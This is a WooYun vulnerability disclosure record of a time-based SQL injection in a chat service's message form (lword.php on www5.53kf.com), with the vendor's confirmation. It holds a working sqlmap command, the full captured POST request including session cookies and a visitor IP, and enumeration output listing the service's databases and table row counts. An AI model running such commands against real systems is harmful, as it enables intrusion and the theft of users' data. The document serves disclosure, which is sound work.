乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-04-25: 细节已通知厂商并且等待厂商处理中 2016-04-25: 厂商已经确认,细节仅向厂商公开 2016-05-05: 细节向核心白帽子及相关领域专家公开 2016-05-15: 细节向普通白帽子公开 2016-05-25: 细节向实习白帽子公开 2016-06-09: 细节向公众公开
RT
post注入语法:sqlmap.py -r 6.txt -D talk --count --tables 延迟注入慢的不行跑了25小时左右======================数据包=========================POST /lword.php HTTP/1.1Host: www5.53kf.comProxy-Connection: keep-aliveContent-Length: 364Origin: http://www5.53kf.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0CONTENT-TYPE: application/x-www-form-urlencodedAccept: */*Referer: http://www5.53kf.com/webCompany.php?arg=9004997&style=1Accept-Encoding: gzip,deflateAccept-Language: zh-CN,zh;q=0.8Cookie: unique_ip_revisit70755185=1461192341; guest_id=10118457428009; land_page_72060147=http%3A%2F%2Fmall.lqxshop.com%2F; unique_ip_revisit72060147=1461358101; land_page_72032248=http%3A%2F%2Fwww.jyh.com%2F; unique_ip_72032248=115.214.46.134; unique_ip_revisit72032248=1461428941; _yd_=GA1.2.343522085.1461434523; Hm_lvt_3a5b4ba61a6b3219159606ddf5c41001=1461434523; Hm_lpvt_3a5b4ba61a6b3219159606ddf5c41001=1461434788; land_page_70865058=http%3A%2F%2Fwww.602.com%2Fkefu%2Fonlinekf%2F; hz6d_open_talk_70865058=1; guest_id=10118457428009; YGXSID=pt2qvomm1p99l0lgg7ui5ss6a2; customer_service_language=cnaction=import&company_id=70865058&tempid=53981272905&guest_id=10118457428009&referer=http://www.602.com/kefu/onlinekf/&referer1=&ly_mode=3&ly_object=&hasrobot=1&talk_his_table=talk_his_d51&message_table=message_d51&ly_name=111&ly_email=313131%40qq.com&ly_phone=13655555555&ly_qq=1&ly_company=111111&ly_check_num=ey46&ly_first=true&iscard=0&m_lyszc=on&ly_content=11
数据库信息
available databases [4]:[*] information_schema[*] ip[*] talk[*] test
当前库表信息
Database: talk+--------------------------------+---------+| Table | Entries |+--------------------------------+---------+| cus_user | 7587356 || chat_worker | 5445630 || message_d17 | 3731202 || statistic_mobile | 2441059 || message | 2298431 || message_d9 | 2148873 || message_d4 | 1988625 || message_d2 | 1808583 || message_d44 | 1777645 || stat_place | 1744358 || imessage | 1743501 || operate_log | 1593692 || message_d1 | 1487943 || message_d6 | 1474119 || message_d3 | 1385246 || message_d5 | 1314770 || message_d18 | 1126727 || quality_tj | 1044778 || message_d7 | 940082 || message_d42 | 910868 || message_d8 | 904577 || message_d51 | 826831 || message_d15 | 765361 || message_d29 | 678242 || message_d41 | 668929 || message_d37 | 657905 || talk_his_d17 | 639533 || talk_his_d4 | 629101 || talk_his | 586510 || cyy | 581547 || talk_his_d18 | 567066 || message_d21 | 555186 || company_config | 545814 || message_d23 | 528215 || message_d40 | 527550 || talk_his_d1 | 489171 || message_d25 | 483640 || message_d34 | 468168 || message_d26 | 457966 || msg_reply | 439597 || talk_his_d2 | 428249 || message_d19 | 428055 || message_d22 | 418819 || message_d43 | 393074 || message_d35 | 390498 || message_d10 | 387334 || link | 369830 || message_d12 | 369510 || sync_cus_user | 324439 || message_d47 | 315373 || message_d49 | 312978 || message_d11 | 312933 || message_d45 | 280488 || talk_his_d3 | 267285 || message_d39 | 252048 || message_d30 | 247659 || message_d27 | 245866 || worker_config | 241491 || message_d20 | 219202 || stat_to | 209362 || message_d13 | 206778 || talk_his_d40 | 195220 || talk_his_d19 | 188558 || message_d36 | 181096 || message_d38 | 173975 || message_d14 | 170788 || talk_his_d21 | 167693 || talk_his_d37 | 161604 || chat_nation | 159047 || file | 154214 || talk_his_d10 | 153588 || message_d24 | 150784 || talk_his_d23 | 145574 || talk_his_d29 | 134416 || talk_his_d22 | 126111 || talk_his_d15 | 120870 || message_d16 | 101893 || talk_his_d25 | 98135 || talk_his_d11 | 94796 || message_d33 | 90019 || talk_his_d27 | 89377 || talk_his_d39 | 89312 || block_user | 86269 || talk_his_d20 | 83174 || message_d28 | 80430 || talk_his_d26 | 77679 || message_d52 | 77008 || zsk_noanswer | 75277 || talk_his_d36 | 68745 || message_d53 | 67881 || cus_bill | 65664 || talk_his_d35 | 64107 || talk_his_d13 | 62955 || cyy_group | 61874 || message_d46 | 60569 || talk_his_d34 | 52756 || talk_his_d12 | 52166 || talk_his_d28 | 38660 || talk_his_d14 | 37929 || cus_web_msg | 37392 || message_d50 | 36374 || talk_his_d30 | 36115 || message_d32 | 34785 || worker | 34396 || talk_his_d24 | 32012 || talk_his_d38 | 29346 || talk_his_d16 | 25001 || message_d31 | 21752 || company_style | 20888 || company | 17999 || talk_his_d33 | 17473 || autoreply | 13039 || talk_his_d53 | 12826 || identity_role_id | 12765 || inner_identity | 12625 || module_new | 11552 || talk_his_d46 | 11188 || kfassign_group_worker | 10913 || sms_lword | 10441 || talk_his_d52 | 10123 || `identity` | 9942 || message_d48 | 9181 || talk_his_d32 | 9129 || worker_group | 7837 || kfassign_group | 7782 || talk_quality | 7514 || zsk_key | 6517 || temp_download_cus_user | 5921 || temp_download_statistic_nation | 4511 || temp_download_statistic_place | 4146 || talk_his_d31 | 3564 || talk_his_d50 | 3505 || talk_his_d41 | 3491 || zsk_question | 3319 || talk_his_d48 | 3249 || company_ad | 3140 || area_kf | 2819 || wechat_guest | 2388 || talk_theme | 1554 || weixin_config | 1417 || cus_theme | 1187 || zsk_category | 756 || temp_download_statistic | 705 || sms_config | 669 || robot_mem | 621 || temp_download_message | 526 || temp_download_chat_worker | 420 || cus_link | 362 || robot_hot | 258 || face | 256 || robot | 236 || cus_mail | 193 || temp_download_stat_place | 167 || cus_group | 157 || kf_group | 149 || email | 148 || logo | 144 || talk_weixin | 141 || temp_download_talk_his | 111 || mailqueue | 101 || image | 76 || company_tinet | 67 || chat_tables | 54 || wmenu | 46 || kf_group_newthing | 44 || temp_download_statistic_from | 44 || account_switch | 38 || temp_download_statistic_net | 26 || sys_notify | 24 || company_tinet_cno | 23 || kf_group_upload | 14 || daemonlog_recv | 11 || daemonlog_send | 11 || mail_template | 11 || wechat_robot_question | 8 || etel_logo | 6 || temp_download_worker | 6 || sph_counter | 2 || download_job | 1 || err_infos | 1 |+--------------------------------+---------+
表字段 数据信息就不跑了吧
过滤
危害等级:高
漏洞Rank:15
确认时间:2016-04-25 09:27
感谢您对问题的反馈,我们将对漏洞做紧急修复,谢谢!
暂无